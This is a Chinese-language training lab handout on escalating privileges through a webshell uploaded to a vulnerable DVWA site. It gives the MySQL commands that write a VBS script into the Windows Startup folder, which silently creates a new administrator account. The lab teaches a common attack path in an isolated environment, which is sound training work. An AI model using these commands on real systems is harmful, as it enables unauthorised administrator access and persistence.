基于Mysql的webshell提权
【实验目的】
通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。
【实验环境】
攻击机:Win2008-att
用户名college,密码360College
使用的webshell文件:dama.php
目标靶机:Win2003-DVWA
用户名college,密码360College
【实验步骤】
1.在靶机Win2003-DVWA上,启动phpstudy,开启漏洞环境。
2.在攻击机上,启动Firefox浏览器,登录靶机上的DVWA网站。
网站的URL为:http://【靶机IP地址】/dvwa
登录用户名为admin,密码为password
3.成功登录DVWA网站后,选择网站左侧菜单“DVWA Security”,将DVWA网站安全等级设置为“Low”。
4.选择网站左侧菜单“File Upload”,将攻击机Win2008-att桌面文件夹Tools中的dama.php(实验中所用的webshell)上传至靶机。
5.dama.php上传成功后,在攻击机浏览的地址栏中输入如下URL连接dama.php:
http://【靶机IP地址】/dvwa/hackable/uploads/dama.php
出现登录提示框时,输入密码hucyuansheng登录。
6.成功登录dama.php后,选择左侧菜单“提权工具”->“MySQL操作”,输入MySQL数据库的登录密码root,以root用户权限登录。
7.选择数据库test,并执行如下操作:
(1)利用如下命令在test下创建一个新的表a:
create table a(cmd text);
该数据表表名为a,表中只存放一个字段,字段名为cmd,为text文本。
(2)利用如下命令在表a中插入内容:
insert into a values("set wshshell=createobject (""wscript.shell"")");
insert into a values("a=wshshell.run(""cmd.exe /c net user 1 1 /add"",0)");
insert into a values("b=wshshell.run(""cmd.exe /c net localgroup administrators 1 /add"",0)");
注意双引号和括号以及后面的"0"一定要输入!将用这三条命令来建立一个vbs脚本程序!后面的"0"表示不弹出CMD窗口,安静地运行。
上述三条命令执行成功后,可以看到如下图所示的结果,表a中已保存了相应的内容。也可以通过执行如下命令查看表a中的内容:
select * from a;
(3)利用如下命令创建一个vbs脚本程序,并将其输出至靶机操作系统的开始启动项中:
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
8.在靶机上验证攻击效果。
(1)点击“开始”菜单->“启动”,会发现启动项中有一个a.vbs的脚本程序;
(2)重启靶机后,在cmd下输入net user命令,会看到靶机操作系统中被添加了一个用户“1”。
实验至此结束。
思考与总结
通过本次实验成功实现了基于webshell执行mysql命令来写入一个自启动功能的vbs脚本,掌握了基于webshell进行提权的方法,能够结合操作系统安全策略,配置数据库和操作系统的各项访问权限。